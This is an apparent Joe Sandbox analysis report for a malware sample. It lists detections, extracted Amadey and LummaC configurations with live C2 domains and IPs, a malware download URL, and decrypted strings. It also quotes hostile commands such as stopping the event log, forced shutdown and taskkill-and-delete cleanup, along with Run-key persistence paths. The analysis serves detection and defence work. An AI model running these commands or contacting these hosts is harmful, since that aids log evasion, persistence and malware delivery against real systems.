                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6072, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 4904, ProcessName: powershell.exe
                          Sigma detected: Windows Processes Suspicious Parent Directory
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1196, ProcessName: svchost.exe

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Sigma detected: Powershell launch regsvr32
                          Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6072, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 4904, ProcessName: powershell.exe
                          Sigma detected: Stop EventLog
                          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentImage: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentProcessId: 5292, ParentProcessName: pcqxl.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 2992, ProcessName: sc.exe

                          Suricata Signatures

                          No Suricata rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: file.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpllAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtPAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpvohvtbtkkqqpcgvyAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php--cinit-version=3.4.1--nicehashAvira URL Cloud: Label: phishing
                          Source: http://185.215.113.16/off/def.exe;Avira URL Cloud: Label: malware
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php6Avira URL Cloud: Label: phishing
                          Source: http://zealous-roentgen.66-63-187-122.plesk.pageAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/98.exeAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtTaskmgr.exeAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtAvira URL Cloud: Label: phishing
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeAvira: detection malicious, Label: TR/Dropper.Gen2
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exeAvira: detection malicious, Label: TR/Dropper.Gen2
                          Source: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                          Source: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Found malware configuration
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: e44fda3216.exe.1608.11.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["crowdwarek.shop", "apporholis.shop", "letterdrive.shop", "handscreamny.shop", "chipdonkeruz.shop", "soundtappysk.shop", "robinsharez.shop", "femalsabler.shop", "versersleep.shop"], "Build id": "LOGS11--6969"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeReversingLabs: Detection: 78%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exeReversingLabs: Detection: 15%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 13%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exeReversingLabs: Detection: 52%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeReversingLabs: Detection: 15%
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeReversingLabs: Detection: 52%
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeReversingLabs: Detection: 13%
                          Source: C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exeReversingLabs: Detection: 36%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeReversingLabs: Detection: 57%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: 185.215.113.43
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: /Zu7JuNko/index.php
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: S-%lu-
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: abc3bc1985
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: skotes.exe
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Startup
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: cmd /C RMDIR /s/q
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: rundll32
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Programs
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: %USERPROFILE%
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: cred.dll|clip.dll|
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: cred.dll
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: clip.dll
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: http://
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: https://
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: /quiet
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: /Plugins/
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: &unit=
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: shell32.dll
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: kernel32.dll
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: GetNativeSystemInfo
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: ProgramData\
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: AVAST Software
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Kaspersky Lab
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Panda Security
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Doctor Web
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: 360TotalSecurity
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Bitdefender
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Norton
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Sophos
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Comodo
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: WinDefender
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: 0123456789
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: ------
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: ?scr=1
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: ComputerName
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: -unicode-
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: VideoID
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: DefaultSettings.XResolution
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: DefaultSettings.YResolution
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: ProductName
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: CurrentBuild
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: rundll32.exe
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: "taskkill /f /im "
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: " && timeout 1 && del
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: && Exit"
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: " && ren
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: Powershell.exe
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: -executionpolicy remotesigned -File "
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: shutdown -s -t 0
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpString decryptor: random

                          Exploits

                          barindex
                          Yara detected UAC Bypass using CMSTP
                          Source: Yara matchFile source: 00000006.00000002.3336204963.0000000002486000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 9LbUK15.exe PID: 7776, type: MEMORYSTR

                          Bitcoin Miner

                          barindex
                          Yara detected Xmrig cryptocurrency miner
                          Source: Yara matchFile source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6596, type: MEMORYSTR
                          Found strings related to Crypto-Mining
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Livid Pocket_is1
                          Source: Binary string: Qzqfjz.pdb source: Ele.exe, 00000015.00000002.3080168462.000000001BF00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Calculadora\Calculadora\obj\Debug\Calculadora.pdbMhgh Yh_CorExeMainmscoree.dll source: 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: pyexpat.pyd.55.dr
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: yklcfqtilcgt.exe, 0000002B.00000003.2499734938.000001ADB9DA0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e44fda3216.exe, 0000000B.00000003.2733601051.0000000007CD0000.00000004.00001000.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3327334251.0000000005BA2000.00000040.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Calculadora\Calculadora\obj\Debug\Calculadora.pdb source: 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: protobuf-net.pdb source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: db3cab6cee.exe, 00000037.00000003.2710982962.000001E194DF4000.00000004.00000020.00020000.00000000.sdmp, db3cab6cee.exe, 00000037.00000002.3303641960.00007FF6F0648000.00000002.00000001.01000000.0000001E.sdmp, db3cab6cee.exe, 00000037.00000000.2700074672.00007FF6F0648000.00000002.00000001.01000000.0000001E.sdmp, db3cab6cee.exe, 00000037.00000003.2707112122.000001E1964A4000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: zjFtdxQ.tmp, 0000000D.00000003.2408195203.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.tmp, 0000000D.00000003.2412265695.0000000003508000.00000004.00001000.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: number of queries: 1001
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                          Networking

                          barindex
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: crowdwarek.shop
                          Source: Malware configuration extractorURLs: apporholis.shop
                          Source: Malware configuration extractorURLs: letterdrive.shop
                          Source: Malware configuration extractorURLs: handscreamny.shop
                          Source: Malware configuration extractorURLs: chipdonkeruz.shop
                          Source: Malware configuration extractorURLs: soundtappysk.shop
                          Source: Malware configuration extractorURLs: robinsharez.shop
                          Source: Malware configuration extractorURLs: femalsabler.shop
                          Source: Malware configuration extractorURLs: versersleep.shop
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                          Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E5E0C0 recv,recv,recv,recv,0_2_00E5E0C0
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                          Source: e44fda3216.exe, 0000000B.00000002.3295646287.00000000004FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe;
                          Source: e44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeEM
                          Source: e44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeEx
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exea
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/off/def.exe
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: yklcfqtilcgt.exe, 0000002B.00000003.2499734938.000001ADB9DA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                          Source: yklcfqtilcgt.exe, 0000002B.00000003.2499734938.000001ADB9DA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                          Source: yklcfqtilcgt.exe, 0000002B.00000003.2499734938.000001ADB9DA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                          Source: yklcfqtilcgt.exe, 0000002B.00000003.2499734938.000001ADB9DA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                          Source: e44fda3216.exe, 0000000B.00000003.2506704362.00000000005FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microP
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: svchost.exe, 0000000A.00000002.3339202766.0000026F20A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
